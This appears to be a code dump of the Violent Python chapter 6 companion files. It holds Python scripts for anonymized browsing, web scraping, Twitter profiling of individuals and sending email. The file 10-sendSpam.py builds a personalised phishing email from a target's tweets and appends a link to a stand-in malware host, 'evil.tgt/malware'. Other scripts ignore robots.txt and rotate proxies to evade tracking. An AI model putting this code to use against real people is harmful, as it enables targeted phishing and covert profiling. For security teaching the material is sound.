| visited.append(link.url) 71 | #Scrape the page, and add to visited 72 | visited += self.mirror(link.url, visited) 73 | except Exception, e: 74 | pass 75 | 76 | #Return visited for trackign purposes 77 | return visited 78 | 79 | v = Violent_Mirror('/home/frosty') 80 | v.mirror('http://www.violentpython.org') -------------------------------------------------------------------------------- /CH6/.svn/text-base/temp.html.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Espn People | Quarkbase 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
-------------------------------------------------------------------------------- /CH6/.svn/text-base/temp.html.svn-base: -------------------------------------------------------------------------------- [Saved HTML snapshot of a Quarkbase results page, "Espn People | Quarkbase", listing people associated with Espn.com ("Displaying results 1 - 20 of 1082"): names and titles (e.g. Russell Wolff, Executive Vice President and Managing Director), short bio excerpts, and Linkedin/Lead411/Zoominfo/Twitter/Myspace profile links, plus a sponsored-links sidebar and Prev/Next paging. The markup itself did not survive extraction, so only this summary is kept.]
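A snapshot like this is the kind of input the CH6 scraping scripts consume. As a minimal, hypothetical illustration (the 'temp.html' file name and the use of <b> tags for names are assumptions about the snapshot summarized above), names could be pulled from the saved page with the same BeautifulSoup pattern used in the next file:

    from BeautifulSoup import BeautifulSoup   #BS3, as used throughout CH6

    #Hypothetical sketch: parse the saved snapshot and print bolded names
    soup = BeautifulSoup(open('temp.html').read())
    for tag in soup.findAll('b'):
        print ''.join(tag.findAll(text = True))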
-------------------------------------------------------------------------------- /CH6/.svn/text-base/test.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | b = mechanize.Browser() 5 | response = b.open('http://www.espn.com').read() 6 | 7 | soup = BeautifulSoup(''.join(response)) 8 | 9 | allTags = soup.findAll(True) 10 | print [tag.name for tag in allTags] 11 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, urllib, re 2 | 3 | def query_twitter(query): 4 | #Urlencode 5 | query = urllib.quote_plus(query) 6 | results = [] 7 | browser = violent_browser.Violent_Browser() 8 | 9 | response = browser.open('http://search.twitter.com/search.json?q=' + query).read() 10 | 11 | #Get the results out of the string returned from twitter 12 | all_results = re.compile('"results"\:\[(.*?)\]').findall(response)[0] 13 | #Split the long string into individual results 14 | for result in all_results.split('},{'): 15 | print result 16 | try: 17 | #Grab 3 important fields 18 | new_result = {} 19 | new_result['from_user'] = re.compile('"from_user_name"\:(.*?),').findall(result)[0] 20 | new_result['geo'] = re.compile('"geo"\:(.*?),').findall(result)[0] 21 | new_result['tweet'] = re.compile('"text"\:"(.*?)",').findall(result)[0] 22 | results.append(new_result) 23 | except: 24 | pass 25 | return results 26 | 27 | print query_twitter('from:ViolentPython since:2010-01-01') -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/twitter.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter_interests.py.svn-base: -------------------------------------------------------------------------------- 1 | import twitter, re, urllib2 2 | 3 | def find_interests(results): 4 | interests = {} 5 | 6 | interests['links'] = [] 7 | interests['users'] = [] 8 | interests['hashtags'] = [] 9 | 10 | for result in results: 11 | tweet = result['tweet'] 12 | #Returns a tuple containing matches for these two regexes 13 | #RE on the left matches links at the very end of the tweet 14 | #RE on the right matches links not at the end 15 | links = re.compile('(http.*?)\Z|(http.*?) 
').findall(tweet) 16 | 17 | for link in links: 18 | #If the first part matched 19 | if link[0]: link = link[0] 20 | #If the second part matched 21 | elif link[1]: link = link[1] 22 | #No part matched, go back to the top 23 | else: continue 24 | 25 | response = urllib2.urlopen(link) 26 | full_link = response.url 27 | interests['links'].append(full_link) 28 | 29 | #\w matches a letter, number, or _ 30 | interests['users'] += re.compile('(@\w+)').findall(tweet) 31 | interests['hashtags'] += re.compile('(#\w+)').findall(tweet) 32 | return interests 33 | 34 | results = twitter.query_twitter('from:ViolentPython') 35 | i = find_interests(results) 36 | print i['links'] -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter_locate.py.svn-base: -------------------------------------------------------------------------------- 1 | import twitter, urllib, web_common, urlparse, os, re 2 | 3 | def locate(tweet, cities): 4 | tweet = tweet.lower() 5 | words_in_tweet = tweet.split(' ') 6 | for word in words_in_tweet: 7 | if word in cities: 8 | return word 9 | return 'unknown' 10 | 11 | def load_cities(file_name): 12 | cities = [] 13 | for line in open(file_name).readlines(): 14 | city = line.split(',')[3] 15 | city = city.replace('"', '').lower() 16 | cities.append(city) 17 | return cities 18 | 19 | cities = load_cities('/home/frosty/Desktop/GeoWorldMap/cities.txt') 20 | 21 | for result in twitter.query_twitter('from:ViolentPython since:2010-01-01'): 22 | if result['geo'] != 'null': 23 | print result['geo'] 24 | else: 25 | print locate(result['tweet'], cities) -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_browser.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, random, time 2 | 3 | class Violent_Browser(mechanize.Browser): 4 | def __init__(self, proxies = [], user_agents = []): 5 | #Initialize the parent browser 6 | mechanize.Browser.__init__(self) 7 | self.set_handle_robots(False) 8 | 9 | self.proxies = proxies 10 | 11 | self.user_agents = user_agents + ['Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 12 | 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)', 13 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'] 14 | 15 | self.anonymize() 16 | 17 | def clear_cookies(self): 18 | cookie_jar = cookielib.LWPCookieJar() 19 | self.set_cookiejar(cookie_jar) 20 | 21 | def change_user_agent(self): 22 | index = random.randrange(0, len(self.user_agents) ) 23 | self.addheaders = [('User-agent', ( self.user_agents[index] ))] 24 | 25 | def change_proxy(self): 26 | if self.proxies: 27 | index = random.randrange(0, len(self.proxies)) 28 | self.set_proxies( {'http': self.proxies[index]} ) 29 | 30 | def anonymize(self, sleep = False): 31 | self.clear_cookies() 32 | self.change_user_agent() 33 | self.change_proxy() 34 | 35 | if sleep: 36 | time.sleep(60) 37 | 38 | vb = Violent_Browser() 39 | 40 | response = vb.open('http://espn.com') --------------------------------------------------------------------------------
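Violent_Browser is written to take caller-supplied proxy and user-agent pools; a brief, hypothetical usage sketch follows (the proxy address and user-agent string are placeholder values, not known-working ones):

    from violent_browser import Violent_Browser

    #Hypothetical pools; any HTTP proxy addresses and UA strings work here
    proxies = ['127.0.0.1:8080']
    agents = ['Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0']

    vb = Violent_Browser(proxies = proxies, user_agents = agents)
    vb.anonymize()   #fresh cookie jar, random user agent, random proxy
    print vb.open('http://example.com').read()[:200]

-------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_browser.pyc.svn-base: --------------------------------------------------------------------------------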
https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_browser.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_email.py.svn-base: -------------------------------------------------------------------------------- 1 | import smtplib 2 | 3 | class Email_Client(): 4 | def __init__(self, server_ip, server_port = 25): 5 | self.server_ip = server_ip 6 | self.server_port = server_port 7 | self.server = smtplib.SMTP(self.server_ip, self.server_port) 8 | 9 | def send_email(self, to_addr, from_addr, subject, text): 10 | body_of_email = 'From: ' + from_addr + '\r\n' 11 | body_of_email += 'To: ' + to_addr + '\r\n' 12 | body_of_email += 'Subject: ' + subject + '\r\n' 13 | body_of_email += '\r\n' + text 14 | 15 | self.server.sendmail(from_addr, [to_addr], body_of_email) 16 | 17 | client = Email_Client('173.255.204.159') 18 | client.send_email('frosty@unluckyfrosty.net', 'frosty@unluckyfrosty.net', 'Hi!', 'Hello') -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_email.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_email.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_person.py.svn-base: -------------------------------------------------------------------------------- 1 | import json, urllib, re, urllib2 2 | from violent_browser import Violent_Browser 3 | 4 | class Violent_Person(): 5 | def __init__(self, first_name, last_name, job = '', social_media = {} ): 6 | self.first_name = first_name 7 | self.last_name = last_name 8 | self.job = job 9 | self.social_media = social_media 10 | 11 | def __repr__(self): 12 | return self.first_name + ' ' + self.last_name + ' has job ' + self.job 13 | 14 | def get_social(self, media_name): 15 | if self.social_media.has_key(media_name): 16 | return self.social_media[media_name] 17 | 18 | return None 19 | 20 | def get_tweets(self, handle): 21 | #Urlencode 22 | query = urllib.quote_plus('from:' + handle + ' since:2009-01-01') 23 | tweets = [] 24 | browser = Violent_Browser() 25 | 26 | #Note, .read() is not called on the response 27 | response = browser.open('http://search.twitter.com/search.json?q=' + query) 28 | 29 | json_objects = json.load(response) 30 | print json_objects 31 | for result in json_objects['results']: 32 | new_result = {} 33 | new_result['from_user'] = result['from_user_name'] 34 | new_result['geo'] = result['geo'] 35 | new_result['tweet'] = result['text'] 36 | tweets.append(new_result) 37 | return tweets 38 | 39 | def twitter_locate(self, tweets): 40 | def load_cities(): 41 | cities = [] 42 | for line in open('/home/frosty/Desktop/GeoWorldMap/cities.txt').readlines(): 43 | city = line.split(',')[3] 44 | city = city.replace('"', '').lower() 45 | cities.append(city) 46 | return cities 47 | 48 | locations = [] 49 | cities = load_cities() 50 | 51 | for tweet in tweets: 52 | if tweet['geo'] != 'null': locations.append(tweet['geo']) 53 | else: 54 | text = tweet['tweet'].lower() 55 | for word in text.split(' '): 56 | #Tweet mentioned a specific city 57 | if word in cities: 58 | locations.append(word) 59 | return locations 60 | 61 | def find_interests(self, tweets): 62 | interests = {} 63 | 64 | 
interests['links'] = [] 65 | interests['users'] = [] 66 | interests['hashtags'] = [] 67 | 68 | for tweet in tweets: 69 | text = tweet['tweet'] 70 | #Returns a tuple containing matches for these two regexes 71 | #RE on the left matches links at the very end of the tweet 72 | #RE on the right matches links not at the end 73 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 74 | 75 | for link in links: 76 | #If the first part matched 77 | if link[0]: link = link[0] 78 | #If the second part matched 79 | elif link[1]: link = link[1] 80 | #No part matched, go back to the top 81 | else: continue 82 | 83 | response = urllib2.urlopen(link) 84 | #Get the full link, not the shortened url provided by twitter 85 | full_link = response.url 86 | interests['links'].append(full_link) 87 | 88 | #\w matches a letter, number, or _ 89 | interests['users'] += re.compile('(@\w+)').findall(text) 90 | interests['hashtags'] += re.compile('(#\w+)').findall(text) 91 | return interests 92 | 93 | def twitter(self): 94 | handle = self.get_social('Twitter') 95 | if not handle: return 'Error, no twitter handle known' 96 | 97 | tweets = self.get_tweets(handle) 98 | locations = self.twitter_locate(tweets) 99 | interests = self.find_interests(tweets) 100 | 101 | return {'tweets': tweets, 'locations' : locations, 'interests': interests} 102 | 103 | vp = Violent_Person('Violent', 'Python', social_media = {'Twitter': 'ViolentPython'}) 104 | vp.twitter() -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_person.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_person.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/web_common.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, random, time 2 | 3 | def anonymize(browser, user_agents, proxies = None): 4 | #If not using a proxy, do nothing 5 | if proxies: 6 | #Random number between 0 and the length of proxies 7 | index = random.randrange(0, len(proxies) ) 8 | #Set browser's proxy to the randomly chosen proxy 9 | browser.set_proxies( {'http': proxies[index]} ) 10 | 11 | #Randomly choose a new user agent string 12 | index = random.randrange(0, len(user_agents)) 13 | browser.addheaders = user_agents[index] 14 | 15 | #Clear cookies 16 | cj = cookielib.LWPCookieJar() 17 | browser.set_cookiejar(cj) 18 | 19 | time.sleep(60) 20 | return browser 21 | 22 | def create_browser(): 23 | #Create the basic browser object 24 | browser = mechanize.Browser() 25 | #Create a handler for cookies, this class can load and save cookies 26 | cj = cookielib.LWPCookieJar() 27 | #Add it to browser 28 | browser.set_cookiejar(cj) 29 | #Ignore robots.txt, so we don't miss anything while scraping 30 | browser.set_handle_robots(False) 31 | #Allow refresh redirections 32 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 33 | #Add a user agent header to our browser 34 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 35 | 'Windows NT 6.1; Trident/5.0)'))] 36 | return browser --------------------------------------------------------------------------------
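The helpers in web_common.py are meant to be composed; a short, hypothetical usage sketch (note that anonymize() expects each user_agents entry to be a complete addheaders list, and that it sleeps 60 seconds before returning the scrubbed browser):

    import web_common

    #Each entry is itself a full addheaders list, as anonymize() assigns
    #user_agents[index] directly to browser.addheaders
    user_agents = [[('User-agent', 'Mozilla/5.0 (X11; Linux i686)')]]

    browser = web_common.create_browser()
    browser = web_common.anonymize(browser, user_agents)
    print browser.open('http://example.com').read()[:100]

-------------------------------------------------------------------------------- /CH6/.svn/text-base/web_common.pyc.svn-base: --------------------------------------------------------------------------------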
https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/web_common.pyc.svn-base -------------------------------------------------------------------------------- /CH6/1-viewPage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def viewPage(url): 7 | browser = mechanize.Browser() 8 | page = browser.open(url) 9 | source_code = page.read() 10 | print source_code 11 | 12 | 13 | viewPage('http://www.syngress.com/') 14 | 15 | -------------------------------------------------------------------------------- /CH6/10-sendMail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import smtplib 4 | from email.mime.text import MIMEText 5 | 6 | 7 | def sendMail(user,pwd,to,subject,text): 8 | 9 | msg = MIMEText(text) 10 | msg['From'] = user 11 | msg['To'] = to 12 | msg['Subject'] = subject 13 | 14 | try: 15 | smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 16 | print "[+] Connecting To Mail Server." 17 | smtpServer.ehlo() 18 | print "[+] Starting Encrypted Session." 19 | smtpServer.starttls() 20 | smtpServer.ehlo() 21 | print "[+] Logging Into Mail Server." 22 | smtpServer.login(user, pwd) 23 | print "[+] Sending Mail." 24 | smtpServer.sendmail(user, to, msg.as_string()) 25 | smtpServer.close() 26 | print "[+] Mail Sent Successfully." 27 | 28 | except: 29 | print "[-] Sending Mail Failed." 30 | 31 | 32 | user = 'username' 33 | pwd = 'password' 34 | 35 | sendMail(user, pwd, 'target@tgt.tgt',\ 36 | 'Re: Important', 'Test Message') 37 | 38 | -------------------------------------------------------------------------------- /CH6/10-sendSpam.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import smtplib 4 | import optparse 5 | 6 | from email.mime.text import MIMEText 7 | from twitterClass import * 8 | from random import choice 9 | 10 | def sendMail(user,pwd,to,subject,text): 11 | 12 | msg = MIMEText(text) 13 | msg['From'] = user 14 | msg['To'] = to 15 | msg['Subject'] = subject 16 | 17 | try: 18 | smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 19 | print "[+] Connecting To Mail Server." 20 | smtpServer.ehlo() 21 | print "[+] Starting Encrypted Session." 22 | smtpServer.starttls() 23 | smtpServer.ehlo() 24 | print "[+] Logging Into Mail Server." 25 | smtpServer.login(user, pwd) 26 | print "[+] Sending Mail." 27 | smtpServer.sendmail(user, to, msg.as_string()) 28 | smtpServer.close() 29 | print "[+] Mail Sent Successfully." 30 | 31 | except: 32 | print "[-] Sending Mail Failed." 
33 | 34 | 35 | def main(): 36 | 37 | parser = optparse.OptionParser('usage %prog '+\ 38 | '-u <twitter handle> -t <target email> '+\ 39 | '-l <gmail login> -p <gmail password>') 40 | 41 | parser.add_option('-u', dest='handle', type='string',\ 42 | help='specify twitter handle') 43 | 44 | parser.add_option('-t', dest='tgt', type='string',\ 45 | help='specify target email') 46 | 47 | parser.add_option('-l', dest='user', type='string',\ 48 | help='specify gmail login') 49 | 50 | parser.add_option('-p', dest='pwd', type='string',\ 51 | help='specify gmail password') 52 | 53 | 54 | (options, args) = parser.parse_args() 55 | handle = options.handle 56 | tgt = options.tgt 57 | user = options.user 58 | pwd = options.pwd 59 | 60 | if handle == None or tgt == None\ 61 | or user == None or pwd == None: 62 | print parser.usage 63 | exit(0) 64 | 65 | 66 | print "[+] Fetching tweets from: "+str(handle) 67 | spamTgt = reconPerson(handle) 68 | spamTgt.get_tweets() 69 | print "[+] Fetching interests from: "+str(handle) 70 | interests = spamTgt.find_interests() 71 | print "[+] Fetching location information from: "+\ 72 | str(handle) 73 | location = spamTgt.twitter_locate('mlb-cities.txt') 74 | 75 | 76 | spamMsg = "Dear "+tgt+"," 77 | 78 | if (location!=None): 79 | randLoc=choice(location) 80 | spamMsg += " It's me from "+randLoc+"." 81 | 82 | if (interests['users']!=None): 83 | randUser=choice(interests['users']) 84 | spamMsg += " "+randUser+" said to say hello." 85 | 86 | if (interests['hashtags']!=None): 87 | randHash=choice(interests['hashtags']) 88 | spamMsg += " Did you see all the fuss about "+\ 89 | randHash+"?" 90 | 91 | if (interests['links']!=None): 92 | randLink=choice(interests['links']) 93 | spamMsg += " I really liked your link to: "+\ 94 | randLink+"." 95 | 96 | spamMsg += " Check out my link to http://evil.tgt/malware" 97 | print "[+] Sending Msg: "+spamMsg 98 | 99 | sendMail(user, pwd, tgt, 'Re: Important', spamMsg) 100 | 101 | if __name__ == '__main__': 102 | main() 103 | 104 | -------------------------------------------------------------------------------- /CH6/2-proxyTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def testProxy(url, proxy): 7 | browser = mechanize.Browser() 8 | browser.set_proxies(proxy) 9 | page = browser.open(url) 10 | source_code = page.read() 11 | print source_code 12 | 13 | 14 | url = 'http://ip.nefsc.noaa.gov/' 15 | hideMeProxy = {'http': '216.155.139.115:3128'} 16 | 17 | testProxy(url, hideMeProxy) 18 | 19 | -------------------------------------------------------------------------------- /CH6/3-userAgentTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def testUserAgent(url, userAgent): 7 | browser = mechanize.Browser() 8 | browser.addheaders = userAgent 9 | page = browser.open(url) 10 | source_code = page.read() 11 | print source_code 12 | 13 | 14 | url = 'http://whatismyuseragent.dotdoh.com/' 15 | userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; '+\ 16 | 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')] 17 | testUserAgent(url, userAgent) 18 | 19 | -------------------------------------------------------------------------------- /CH6/4-printCookies.py: -------------------------------------------------------------------------------- 1 | import mechanize 2 | import cookielib 3 | 4 | def printCookies(url): 5 | browser = mechanize.Browser() 6 | cookie_jar = 
cookielib.LWPCookieJar() 7 | browser.set_cookiejar(cookie_jar) 8 | page = browser.open(url) 9 | for cookie in cookie_jar: 10 | print cookie 11 | 12 | url = 'http://www.syngress.com/' 13 | printCookies(url) 14 | -------------------------------------------------------------------------------- /CH6/5-kittenTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from anonBrowser import * 4 | 5 | ab = anonBrowser(proxies=[],\ 6 | user_agents=[('User-agent','superSecretBrowser')]) 7 | 8 | for attempt in range(1, 5): 9 | ab.anonymize() 10 | print '[*] Fetching page' 11 | response = ab.open('http://kittenwar.com') 12 | for cookie in ab.cookie_jar: 13 | print cookie 14 | -------------------------------------------------------------------------------- /CH6/6-linkParser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from anonBrowser import * 5 | from BeautifulSoup import BeautifulSoup 6 | import os 7 | import optparse 8 | import re 9 | 10 | 11 | def printLinks(url): 12 | 13 | ab = anonBrowser() 14 | ab.anonymize() 15 | page = ab.open(url) 16 | html = page.read() 17 | 18 | try: 19 | print '[+] Printing Links From Regex.' 20 | link_finder = re.compile('href="(.*?)"') 21 | links = link_finder.findall(html) 22 | for link in links: 23 | print link 24 | except: 25 | pass 26 | 27 | try: 28 | print '\n[+] Printing Links From BeautifulSoup.' 29 | soup = BeautifulSoup(html) 30 | links = soup.findAll(name='a') 31 | for link in links: 32 | if link.has_key('href'): 33 | print link['href'] 34 | except: 35 | pass 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('usage %prog ' +\ 40 | '-u <target url>') 41 | 42 | parser.add_option('-u', dest='tgtURL', type='string',\ 43 | help='specify target url') 44 | 45 | (options, args) = parser.parse_args() 46 | url = options.tgtURL 47 | 48 | if url == None: 49 | print parser.usage 50 | exit(0) 51 | else: 52 | printLinks(url) 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | 58 | -------------------------------------------------------------------------------- /CH6/7-imageMirror.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from anonBrowser import * 5 | from BeautifulSoup import BeautifulSoup 6 | import os 7 | import optparse 8 | 9 | 10 | def mirrorImages(url, dir): 11 | ab = anonBrowser() 12 | ab.anonymize() 13 | html = ab.open(url) 14 | soup = BeautifulSoup(html) 15 | image_tags = soup.findAll('img') 16 | 17 | for image in image_tags: 18 | filename = image['src'].lstrip('http://') 19 | filename = os.path.join(dir,\ 20 | filename.replace('/', '_')) 21 | print '[+] Saving ' + str(filename) 22 | data = ab.open(image['src']).read() 23 | ab.back() 24 | save = open(filename, 'wb') 25 | save.write(data) 26 | save.close() 27 | 28 | 29 | def main(): 30 | parser = optparse.OptionParser('usage %prog '+\ 31 | '-u <target url> -d <destination directory>') 32 | 33 | parser.add_option('-u', dest='tgtURL', type='string',\ 34 | help='specify target url') 35 | parser.add_option('-d', dest='dir', type='string',\ 36 | help='specify destination directory') 37 | 38 | (options, args) = parser.parse_args() 39 | 40 | url = options.tgtURL 41 | dir = options.dir 42 | 43 | if url == None or dir == None: 44 | print parser.usage 45 | exit(0) 46 | 47 | else: 48 | try: 49 | mirrorImages(url, dir) 50 | except Exception, e: 51 | print '[-] Error Mirroring 
Images.' 52 | print '[-] ' + str(e) 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | 58 | -------------------------------------------------------------------------------- /CH6/8-anonGoogle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | import optparse 6 | from anonBrowser import * 7 | 8 | 9 | class Google_Result: 10 | 11 | def __init__(self,title,text,url): 12 | self.title = title 13 | self.text = text 14 | self.url = url 15 | 16 | def __repr__(self): 17 | return self.title 18 | 19 | 20 | def google(search_term): 21 | ab = anonBrowser() 22 | 23 | search_term = urllib.quote_plus(search_term) 24 | response = ab.open('http://ajax.googleapis.com/'+\ 25 | 'ajax/services/search/web?v=1.0&q='+ search_term) 26 | objects = json.load(response) 27 | results = [] 28 | 29 | for result in objects['responseData']['results']: 30 | url = result['url'] 31 | title = result['titleNoFormatting'] 32 | text = result['content'] 33 | new_gr = Google_Result(title, text, url) 34 | results.append(new_gr) 35 | return results 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('usage %prog ' +\ 40 | '-k <keywords>') 41 | parser.add_option('-k', dest='keyword', type='string',\ 42 | help='specify google keyword') 43 | (options, args) = parser.parse_args() 44 | keyword = options.keyword 45 | 46 | if options.keyword == None: 47 | print parser.usage 48 | exit(0) 49 | else: 50 | results = google(keyword) 51 | print results 52 | 53 | 54 | if __name__ == '__main__': 55 | main() 56 | 57 | -------------------------------------------------------------------------------- /CH6/8-googleJson.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | from anonBrowser import * 6 | 7 | 8 | def google(search_term): 9 | ab = anonBrowser() 10 | 11 | search_term = urllib.quote_plus(search_term) 12 | response = ab.open('http://ajax.googleapis.com/'+\ 13 | 'ajax/services/search/web?v=1.0&q='+ search_term) 14 | objects = json.load(response) 15 | 16 | print objects 17 | 18 | 19 | google('Boondock Saint') 20 | 21 | -------------------------------------------------------------------------------- /CH6/8-googleJumbled.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | 6 | 7 | def google(search_term): 8 | ab = anonBrowser() 9 | 10 | search_term = urllib.quote_plus(search_term) 11 | response = ab.open('http://ajax.googleapis.com/'+\ 12 | 'ajax/services/search/web?v=1.0&q='+ search_term) 13 | print response.read() 14 | 15 | google('Boondock Saint') 16 | 17 | -------------------------------------------------------------------------------- /CH6/9-twitterClass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | import json 6 | import re 7 | import urllib2 8 | 9 | 10 | class reconPerson: 11 | 12 | def __init__(self, handle): 13 | self.handle = handle 14 | self.tweets = self.get_tweets() 15 | 16 | def get_tweets(self): 17 | query = urllib.quote_plus('from:' + self.handle+\ 18 | ' since:2009-01-01 include:retweets' 19 | ) 20 | tweets = [] 21 | browser = anonBrowser() 22 | browser.anonymize() 23 | response = 
browser.open('http://search.twitter.com/'+\ 24 | 'search.json?q=' + query) 25 | 26 | json_objects = json.load(response) 27 | for result in json_objects['results']: 28 | new_result = {} 29 | new_result['from_user'] = result['from_user_name'] 30 | new_result['geo'] = result['geo'] 31 | new_result['tweet'] = result['text'] 32 | tweets.append(new_result) 33 | return tweets 34 | 35 | def find_interests(self): 36 | interests = {} 37 | interests['links'] = [] 38 | interests['users'] = [] 39 | interests['hashtags'] = [] 40 | 41 | for tweet in self.tweets: 42 | text = tweet['tweet'] 43 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 44 | 45 | for link in links: 46 | if link[0]: 47 | link = link[0] 48 | elif link[1]: 49 | link = link[1] 50 | else: 51 | continue 52 | 53 | try: 54 | response = urllib2.urlopen(link) 55 | full_link = response.url 56 | interests['links'].append(full_link) 57 | except: 58 | pass 59 | interests['users'] +=\ 60 | re.compile('(@\w+)').findall(text) 61 | interests['hashtags'] +=\ 62 | re.compile('(#\w+)').findall(text) 63 | 64 | interests['users'].sort() 65 | interests['hashtags'].sort() 66 | interests['links'].sort() 67 | return interests 68 | 69 | def twitter_locate(self, cityFile): 70 | cities = [] 71 | if cityFile != None: 72 | for line in open(cityFile).readlines(): 73 | city = line.strip('\n').strip('\r').lower() 74 | cities.append(city) 75 | 76 | locations = [] 77 | locCnt = 0 78 | cityCnt = 0 79 | tweetsText = '' 80 | 81 | for tweet in self.tweets: 82 | if tweet['geo'] != None: 83 | locations.append(tweet['geo']) 84 | locCnt += 1 85 | 86 | tweetsText += tweet['tweet'].lower() 87 | 88 | for city in cities: 89 | if city in tweetsText: 90 | locations.append(city) 91 | cityCnt += 1 92 | 93 | return locations 94 | 95 | 96 | -------------------------------------------------------------------------------- /CH6/9-twitterGeo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | import optparse 6 | from anonBrowser import * 7 | 8 | def get_tweets(handle): 9 | query = urllib.quote_plus('from:' + handle+\ 10 | ' since:2009-01-01 include:retweets') 11 | tweets = [] 12 | browser = anonBrowser() 13 | browser.anonymize() 14 | 15 | response = browser.open('http://search.twitter.com/'+\ 16 | 'search.json?q='+ query) 17 | 18 | json_objects = json.load(response) 19 | for result in json_objects['results']: 20 | new_result = {} 21 | new_result['from_user'] = result['from_user_name'] 22 | new_result['geo'] = result['geo'] 23 | new_result['tweet'] = result['text'] 24 | tweets.append(new_result) 25 | 26 | return tweets 27 | 28 | 29 | def load_cities(cityFile): 30 | cities = [] 31 | for line in open(cityFile).readlines(): 32 | city=line.strip('\n').strip('\r').lower() 33 | cities.append(city) 34 | return cities 35 | 36 | def twitter_locate(tweets,cities): 37 | locations = [] 38 | locCnt = 0 39 | cityCnt = 0 40 | tweetsText = "" 41 | 42 | for tweet in tweets: 43 | if tweet['geo'] != None: 44 | locations.append(tweet['geo']) 45 | locCnt += 1 46 | 47 | tweetsText += tweet['tweet'].lower() 48 | 49 | for city in cities: 50 | if city in tweetsText: 51 | locations.append(city) 52 | cityCnt+=1 53 | 54 | print "[+] Found "+str(locCnt)+" locations "+\ 55 | "via Twitter API and "+str(cityCnt)+\ 56 | " locations from text search." 
